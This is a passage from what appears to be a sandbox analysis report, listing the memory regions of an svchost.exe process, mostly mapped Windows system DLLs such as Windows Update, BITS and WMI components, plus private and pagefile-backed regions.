"c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2550 start_va = 0xc62acc0000 end_va = 0xc62accffff entry_point = 0xc62acc0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2551 start_va = 0xc62acd0000 end_va = 0xc62acdffff entry_point = 0xc62acd0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2552 start_va = 0xc62ace0000 end_va = 0xc62aceffff entry_point = 0xc62ace0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2553 start_va = 0xc62acf0000 end_va = 0xc62acfffff entry_point = 0xc62acf0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2554 start_va = 0xc62ad00000 end_va = 0xc62ad0ffff entry_point = 0xc62ad00000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2555 start_va = 0xc62ad10000 end_va = 0xc62ad1ffff entry_point = 0xc62ad10000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2556 start_va = 0xc62ad20000 end_va = 0xc62ad27fff entry_point = 0x0 region_type = private name = "private_0x000000c62ad20000" filename = "" Region: id = 2557 start_va = 0xc62ad30000 end_va = 0xc62ad3ffff entry_point = 0xc62ad30000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2558 start_va = 0xc62ad40000 end_va = 0xc62adbffff entry_point = 0x0 region_type = private name = "private_0x000000c62ad40000" filename = "" Region: id = 2559 start_va = 0xc62b040000 end_va = 0xc62b0bffff entry_point = 0x0 region_type = private name = "private_0x000000c62b040000" filename = "" Region: id = 2560 start_va = 0xc62b0c0000 end_va = 0xc62b13ffff entry_point = 0x0 region_type = private name = "private_0x000000c62b0c0000" filename = "" Region: id = 2561 start_va = 0xc62b140000 end_va = 0xc62b1bffff entry_point = 0x0 region_type = private name = "private_0x000000c62b140000" filename = "" Region: id = 2562 start_va = 0x7ff6dba04000 end_va = 0x7ff6dba05fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba04000" filename = "" Region: id = 2563 start_va = 0x7ff6dba06000 end_va = 0x7ff6dba07fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba06000" filename = "" Region: id = 2564 start_va = 0x7ff6dba08000 end_va = 0x7ff6dba09fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba08000" filename = "" Region: id = 2565 start_va = 0x7ff6dba10000 end_va = 0x7ff6dba11fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba10000" filename = "" Region: id = 2566 start_va = 0x7ff6dba12000 end_va = 0x7ff6dba13fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba12000" filename = "" Region: id = 2567 start_va = 0x7ff6dba22000 end_va = 0x7ff6dba23fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba22000" filename = "" Region: id = 2568 start_va = 0x7ff6dba26000 end_va = 0x7ff6dba27fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba26000" filename = "" Region: id = 2569 start_va = 0x7ff6dba28000 end_va = 0x7ff6dba29fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba28000" filename = "" Region: id = 2570 start_va = 0x7ff6dba2a000 end_va = 0x7ff6dba2bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba2a000" filename = "" Region: id = 2571 start_va = 0x7ff6dba2c000 end_va = 0x7ff6dba2dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba2c000" filename = "" Region: id = 2572 start_va = 0x7ff6dba2e000 end_va = 0x7ff6dba2ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba2e000" filename = "" Region: id = 2573 start_va = 0x7ff6dba30000 end_va = 0x7ff6dba31fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba30000" filename = "" Region: id = 2574 start_va = 0x7ff6dba32000 end_va = 0x7ff6dba33fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba32000" filename = "" Region: id = 2575 start_va = 0x7ff6dba34000 end_va = 0x7ff6dba35fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba34000" filename = "" Region: id = 2576 start_va = 0x7ff6dba36000 end_va = 0x7ff6dba37fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba36000" filename = "" Region: id = 2577 start_va = 0x7ff6dba38000 end_va = 0x7ff6dba39fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba38000" filename = "" Region: id = 2578 start_va = 0x7ff6dba3a000 end_va = 0x7ff6dba3bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba3a000" filename = "" Region: id = 2579 start_va = 0x7ff6dba3c000 end_va = 0x7ff6dba3dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba3c000" filename = "" Region: id = 2580 start_va = 0x7ff6dba3e000 end_va = 0x7ff6dba3ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba3e000" filename = "" Region: id = 2581 start_va = 0x7ff6dba40000 end_va = 0x7ff6dba41fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba40000" filename = "" Region: id = 2582 start_va = 0x7ff6dba42000 end_va = 0x7ff6dba43fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba42000" filename = "" Region: id = 2583 start_va = 0x7ff6dba44000 end_va = 0x7ff6dba45fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba44000" filename = "" Region: id = 2584 start_va = 0x7ff6dba46000 end_va = 0x7ff6dba47fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba46000" filename = "" Region: id = 2585 start_va = 0x7ff6dba48000 end_va = 0x7ff6dba49fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba48000" filename = "" Region: id = 2586 start_va = 0x7ff6dba4a000 end_va = 0x7ff6dba4bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba4a000" filename = "" Region: id = 2587 start_va = 0x7ff6dba4c000 end_va = 0x7ff6dba4dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba4c000" filename = "" Region: id = 2588 start_va = 0x7ff6dba50000 end_va = 0x7ff6dba51fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba50000" filename = "" Region: id = 2589 start_va = 0x7ff6dba52000 end_va = 0x7ff6dba53fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba52000" filename = "" Region: id = 2590 start_va = 0x7ff6dba54000 end_va = 0x7ff6dba55fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba54000" filename = "" Region: id = 2591 start_va = 0x7ff6dba56000 end_va = 0x7ff6dba57fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba56000" filename = "" Region: id = 2592 start_va = 0x7ff6dba58000 end_va = 0x7ff6dba59fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba58000" filename = "" Region: id = 2593 start_va = 0x7ff6dba5a000 end_va = 0x7ff6dba5bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba5a000" filename = "" Region: id = 2594 start_va = 0x7ff6dba5c000 end_va = 0x7ff6dba5dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba5c000" filename = "" Region: id = 2595 start_va = 0x7ff6dba5e000 end_va = 0x7ff6dba5ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba5e000" filename = "" Region: id = 2596 start_va = 0x7ff6dba60000 end_va = 0x7ff6dba61fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba60000" filename = "" Region: id = 2597 start_va = 0x7ff6dba62000 end_va = 0x7ff6dba63fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba62000" filename = "" Region: id = 2598 start_va = 0x7ff6dba64000 end_va = 0x7ff6dba65fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba64000" filename = "" Region: id = 2599 start_va = 0x7ff6dba66000 end_va = 0x7ff6dba67fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba66000" filename = "" Region: id = 2600 start_va = 0x7ff6dba68000 end_va = 0x7ff6dba69fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba68000" filename = "" Region: id = 2601 start_va = 0x7ff6dba6a000 end_va = 0x7ff6dba6bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba6a000" filename = "" Region: id = 2602 start_va = 0x7ff6dba6c000 end_va = 0x7ff6dba6dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba6c000" filename = "" Region: id = 2603 start_va = 0x7ff6dba6e000 end_va = 0x7ff6dba6ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba6e000" filename = "" Region: id = 2604 start_va = 0x7ff6dba72000 end_va = 0x7ff6dba73fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba72000" filename = "" Region: id = 2605 start_va = 0x7ff6dba74000 end_va = 0x7ff6dba75fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba74000" filename = "" Region: id = 2606 start_va = 0x7ff6dba76000 end_va = 0x7ff6dba77fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba76000" filename = "" Region: id = 2607 start_va = 0x7ff6dba78000 end_va = 0x7ff6dba79fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba78000" filename = "" Region: id = 2608 start_va = 0x7ff6dba7a000 end_va = 0x7ff6dba7bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba7a000" filename = "" Region: id = 2609 start_va = 0x7ff6dba7c000 end_va = 0x7ff6dba7dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba7c000" filename = "" Region: id = 2610 start_va = 0x7ff6dba7e000 end_va = 0x7ff6dba7ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba7e000" filename = "" Region: id = 2611 start_va = 0x7ff6dba80000 end_va = 0x7ff6dba81fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba80000" filename = "" Region: id = 2612 start_va = 0x7ff6dba82000 end_va = 0x7ff6dba83fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba82000" filename = "" Region: id = 2613 start_va = 0x7ff6dba84000 end_va = 0x7ff6dba85fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba84000" filename = "" Region: id = 2614 start_va = 0x7ff6dba86000 end_va = 0x7ff6dba87fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba86000" filename = "" Region: id = 2615 start_va = 0x7ff6dba88000 end_va = 0x7ff6dba89fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba88000" filename = "" Region: id = 2616 start_va = 0x7ff6dba8a000 end_va = 0x7ff6dba8bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba8a000" filename = "" Region: id = 2617 start_va = 0x7ff6dba8c000 end_va = 0x7ff6dba8dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba8c000" filename = "" Region: id = 2618 start_va = 0x7ff6dba8e000 end_va = 0x7ff6dba8ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6dba8e000" filename = "" Region: id = 2619 start_va = 0x7ff6dba90000 end_va = 0x7ff6dbb8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6dba90000" filename = "" Region: id = 2620 start_va = 0x7ff6dbb90000 end_va = 0x7ff6dbbb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6dbb90000" filename = "" Region: id = 2621 start_va = 0x7ff6dbbb4000 end_va = 0x7ff6dbbb5fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dbbb4000" filename = "" Region: id = 2622 start_va = 0x7ff6dbbb6000 end_va = 0x7ff6dbbb7fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dbbb6000" filename = "" Region: id = 2623 start_va = 0x7ff6dbbb8000 end_va = 0x7ff6dbbb9fff entry_point = 0x0 region_type = private name = "private_0x00007ff6dbbb8000" filename = "" Region: id = 2624 start_va = 0x7ff6dbbba000 end_va = 0x7ff6dbbbbfff entry_point = 0x0 region_type = private name = "private_0x00007ff6dbbba000" filename = "" Region: id = 2625 start_va = 0x7ff6dbbbc000 end_va = 0x7ff6dbbbdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6dbbbc000" filename = "" Region: id = 2626 start_va = 0x7ff6dbbbe000 end_va = 0x7ff6dbbbefff entry_point = 0x0 region_type = private name = "private_0x00007ff6dbbbe000" filename = "" Region: id = 2627 start_va = 0x7ff6dbe30000 end_va = 0x7ff6dbe3bfff entry_point = 0x7ff6dbe30000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2628 start_va = 0x7ffb0b520000 end_va = 0x7ffb0b552fff entry_point = 0x7ffb0b520000 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 2629 start_va = 0x7ffb0bad0000 end_va = 0x7ffb0badcfff entry_point = 0x7ffb0bad0000 region_type = mapped_file name = "wcmapi.dll" filename = "\\Windows\\System32\\wcmapi.dll" (normalized: "c:\\windows\\system32\\wcmapi.dll") Region: id = 2630 start_va = 0x7ffb0bae0000 end_va = 0x7ffb0baf1fff entry_point = 0x7ffb0bae0000 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 2631 start_va = 0x7ffb0bb00000 end_va = 0x7ffb0bb0ffff entry_point = 0x7ffb0bb00000 region_type = mapped_file name = "mspatcha.dll" filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll") Region: id = 2632 start_va = 0x7ffb0bb10000 end_va = 0x7ffb0be54fff entry_point = 0x7ffb0bb10000 region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 2633 start_va = 0x7ffb0be60000 end_va = 0x7ffb0be85fff entry_point = 0x7ffb0be60000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 2634 start_va = 0x7ffb0d8e0000 end_va = 0x7ffb0d95dfff entry_point = 0x7ffb0d8e0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 2635 start_va = 0x7ffb0dc70000 end_va = 0x7ffb0dca5fff entry_point = 0x7ffb0dc70000 region_type = mapped_file name = "aelupsvc.dll" filename = "\\Windows\\System32\\aelupsvc.dll" (normalized: "c:\\windows\\system32\\aelupsvc.dll") Region: id = 2636 start_va = 0x7ffb0dcb0000 end_va = 0x7ffb0dcb8fff entry_point = 0x7ffb0dcb0000 region_type = mapped_file name = "bitsprx3.dll" filename = "\\Windows\\System32\\bitsprx3.dll" (normalized: "c:\\windows\\system32\\bitsprx3.dll") Region: id = 2637 start_va = 0x7ffb0dcc0000 end_va = 0x7ffb0dccdfff entry_point = 0x7ffb0dcc0000 region_type = mapped_file name = "bitsprx5.dll" filename = "\\Windows\\System32\\bitsprx5.dll" (normalized: "c:\\windows\\system32\\bitsprx5.dll") Region: id = 2638 start_va = 0x7ffb0dcd0000 end_va = 0x7ffb0dcd8fff entry_point = 0x7ffb0dcd0000 region_type = mapped_file name = "bitsprx7.dll" filename = "\\Windows\\System32\\bitsprx7.dll" (normalized: "c:\\windows\\system32\\bitsprx7.dll") Region: id = 2639 start_va = 0x7ffb0dce0000 end_va = 0x7ffb0dce8fff entry_point = 0x7ffb0dce0000 region_type = mapped_file name = "bitsprx2.dll" filename = "\\Windows\\System32\\bitsprx2.dll" (normalized: "c:\\windows\\system32\\bitsprx2.dll") Region: id = 2640 start_va = 0x7ffb0dcf0000 end_va = 0x7ffb0dd69fff entry_point = 0x7ffb0dcf0000 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 2641 start_va = 0x7ffb0dd70000 end_va = 0x7ffb0dd84fff entry_point = 0x7ffb0dd70000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 2642 start_va = 0x7ffb0dd90000 end_va = 0x7ffb0de56fff entry_point = 0x7ffb0dd90000 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 2643 start_va = 0x7ffb0de70000 end_va = 0x7ffb0ded2fff entry_point = 0x7ffb0de70000 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 2644 start_va = 0x7ffb0dee0000 end_va = 0x7ffb0df03fff entry_point = 0x7ffb0dee0000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 2645 start_va = 0x7ffb0df10000 end_va = 0x7ffb0df23fff entry_point = 0x7ffb0df10000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2646 start_va = 0x7ffb0df30000 end_va = 0x7ffb0e013fff entry_point = 0x7ffb0df30000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2647 start_va = 0x7ffb0e020000 end_va = 0x7ffb0e08cfff entry_point = 0x7ffb0e020000 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 2648 start_va = 0x7ffb0e090000 end_va = 0x7ffb0e1bcfff entry_point = 0x7ffb0e090000 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 2649 start_va = 0x7ffb0e1c0000 end_va = 0x7ffb0e1cefff entry_point = 0x7ffb0e1c0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2650 start_va = 0x7ffb0e1d0000 end_va = 0x7ffb0e24efff entry_point = 0x7ffb0e1d0000 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 2651 start_va = 0x7ffb0e290000 end_va = 0x7ffb0e2f1fff entry_point = 0x7ffb0e290000 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 2652 start_va = 0x7ffb0e300000 end_va = 0x7ffb0e310fff entry_point = 0x7ffb0e300000 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 2653 start_va = 0x7ffb0e320000 end_va = 0x7ffb0e361fff entry_point = 0x7ffb0e320000 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 2654 start_va = 0x7ffb0e370000 end_va = 0x7ffb0e3affff entry_point = 0x7ffb0e370000 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 2655 start_va = 0x7ffb0e3b0000 end_va = 0x7ffb0e3f1fff entry_point = 0x7ffb0e3b0000 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 2656 start_va = 0x7ffb0e400000 end_va = 0x7ffb0e408fff entry_point = 0x7ffb0e400000 region_type = mapped_file name = "bitsprx6.dll" filename = "\\Windows\\System32\\bitsprx6.dll" (normalized: "c:\\windows\\system32\\bitsprx6.dll") Region: id = 2657 start_va = 0x7ffb0e960000 end_va = 0x7ffb0e973fff entry_point = 0x7ffb0e960000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 2658 start_va = 0x7ffb0e9b0000 end_va = 0x7ffb0e9b9fff entry_point = 0x7ffb0e9b0000 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 2659 start_va = 0x7ffb0e9c0000 end_va = 0x7ffb0eabbfff entry_point = 0x7ffb0e9c0000 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 2660 start_va = 0x7ffb0ebd0000 end_va = 0x7ffb0ebe8fff entry_point = 0x7ffb0ebd0000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 2661 start_va = 0x7ffb0ebf0000 end_va = 0x7ffb0ebfbfff entry_point = 0x7ffb0ebf0000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 2662 start_va = 0x7ffb0ed50000 end_va = 0x7ffb0ed91fff entry_point = 0x7ffb0ed50000 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 2663 start_va = 0x7ffb0f5e0000 end_va = 0x7ffb0f657fff entry_point = 0x7ffb0f5e0000 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 2664 start_va = 0x7ffb0f660000 end_va = 0x7ffb0f8a2fff entry_point = 0x7ffb0f660000 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 2665 start_va = 0x7ffb0fa70000 end_va = 0x7ffb0fab7fff entry_point = 0x7ffb0fa70000 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 2666 start_va = 0x7ffb0fac0000 end_va = 0x7ffb0fb2afff entry_point = 0x7ffb0fac0000 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 2667 start_va = 0x7ffb0fc30000 end_va = 0x7ffb0fc78fff entry_point = 0x7ffb0fc30000 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 2668 start_va = 0x7ffb11730000 end_va = 0x7ffb117aefff entry_point = 0x7ffb11730000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2669 start_va = 0x7ffb117b0000 end_va = 0x7ffb117b9fff entry_point = 0x7ffb117b0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2670 start_va = 0x7ffb117c0000 end_va = 0x7ffb117f9fff entry_point = 0x7ffb117c0000 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 2671 start_va = 0x7ffb11830000 end_va = 0x7ffb11842fff entry_point = 0x7ffb11830000 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 2672 start_va = 0x7ffb12970000 end_va = 0x7ffb12a34fff entry_point = 0x7ffb12970000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 2673 start_va = 0x7ffb130f0000 end_va = 0x7ffb13105fff entry_point = 0x7ffb130f0000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 2674 start_va = 0x7ffb13110000 end_va = 0x7ffb1328ffff entry_point = 0x7ffb13110000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 2675 start_va = 0x7ffb135d0000 end_va = 0x7ffb1360cfff entry_point = 0x7ffb135d0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 2676 start_va = 0x7ffb137b0000 end_va = 0x7ffb137bffff entry_point = 0x7ffb137b0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 2677 start_va = 0x7ffb13950000 end_va = 0x7ffb1395afff entry_point = 0x7ffb13950000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2678 start_va = 0x7ffb13b10000 end_va = 0x7ffb13b8afff entry_point = 0x7ffb13b10000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 2679 start_va = 0x7ffb14020000 end_va = 0x7ffb1402ffff entry_point = 0x7ffb14020000 region_type = mapped_file name = "qmgrprxy.dll" filename = "\\Windows\\System32\\qmgrprxy.dll" (normalized: "c:\\windows\\system32\\qmgrprxy.dll") Region: id = 2680 start_va = 0x7ffb142c0000 end_va = 0x7ffb142defff entry_point = 0x7ffb142c0000 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 2681 start_va = 0x7ffb142e0000 end_va = 0x7ffb142fbfff entry_point = 0x7ffb142e0000 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 2682 start_va = 0x7ffb145e0000 end_va = 0x7ffb14899fff entry_point = 0x7ffb145e0000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 2683 start_va = 0x7ffb15600000 end_va = 0x7ffb1567bfff entry_point = 0x7ffb15600000 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 2684 start_va = 0x7ffb15750000 end_va = 0x7ffb1576afff entry_point = 0x7ffb15750000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 2685 start_va = 0x7ffb15770000 end_va = 0x7ffb15a18fff entry_point = 0x7ffb15770000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 2686 start_va = 0x7ffb15a20000 end_va = 0x7ffb15c4ffff entry_point = 0x7ffb15a20000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 2687 start_va = 0x7ffb15c50000 end_va = 0x7ffb15c5bfff entry_point = 0x7ffb15c50000 region_type = mapped_file name = "credentialmigrationhandler.dll" filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll") Region: id = 2688 start_va = 0x7ffb15c60000 end_va = 0x7ffb15c69fff entry_point = 0x7ffb15c60000 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 2689 start_va = 0x7ffb15c70000 end_va = 0x7ffb15c7afff entry_point = 0x7ffb15c70000 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 2690 start_va = 0x7ffb15c80000 end_va = 0x7ffb15cb4fff entry_point = 0x7ffb15c80000 region_type = mapped_file name = 